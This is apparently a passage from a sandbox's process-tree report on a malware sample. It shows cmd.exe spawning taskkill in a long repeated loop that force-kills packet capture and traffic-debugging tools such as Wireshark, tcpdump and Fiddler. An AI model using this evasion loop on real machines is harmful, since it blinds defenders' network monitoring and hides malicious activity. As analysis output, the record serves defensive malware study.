C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:3968

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2896

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:3512

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:2840

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:2080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:1892

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:3552

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:3568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:3700

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:2172

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:1660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:1340

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:4936

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:4236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5284

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:4808

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:6040

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:336

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:4124

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:992

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:1924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4320

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:5956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5380

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:3516

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:4576

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5156

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5412

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:3376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5640

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:2980

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:4536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:3440

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:3932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3884

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:2536

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2888

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3400

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:3304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:1544

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2784

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:3856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:2696

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
- Kills process with taskkill
PID:2816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:3384

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:5364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:4528

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:3020

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:4360

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:4088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:1892

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:568

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:4268

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:3812

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:3008

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5280

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:6100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5400

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:2508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5932

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:2532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3732

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:3708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:4944

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2604

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:1824

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5328

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:5136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:6068

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5812

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:1440

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:4160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3376

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5104

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
- Kills process with taskkill
PID:468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:3300

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:6056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:3932

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:4796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4748

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5676

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:2040

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5520

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5720

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:3856

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:1376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2028

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:636

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:1232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:3820

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:3772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:2304

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:3992

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:6024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:1760

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:4336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:2344

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:2168

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
- Kills process with taskkill
PID:4056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:1312

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:2752

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:6032

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5004

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5288

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2324

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:4212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:4940

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:4816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:1872

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:1532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:3420

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:1792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5340

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:1480

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:2364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:6060

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:3868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:6108

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5356

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:2336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:1848

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:4928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:1656

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:2756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:4484

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:1048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:4064

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:6000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:956

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3304

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:3280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:4824

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:3748

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:2492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3600

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:3684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5668

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:6012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5360

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:6020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:1888

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:3512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:1224

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:2184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3104

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:4548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:3120

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:2236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5816

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:576

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:3904

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:4236

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:4140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5124

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:3784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4980

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:2944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:2964

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:4032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:4212

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:6136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:4816

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:1532

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:1792

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5596

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:4308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:2364

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:5156

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:5388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:3040

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5144

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2284

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:4996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3396

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:5736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:3112

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:5896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:5744

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:2164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:1540

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:2968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:3400

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:908

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5172

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:2728

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3384

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:2228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5368

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:4352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2368

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:5036

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:1412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:1424

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:6096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5672

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:5836

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:952

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:5660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3564

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:1844

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:4680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2700

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:6100
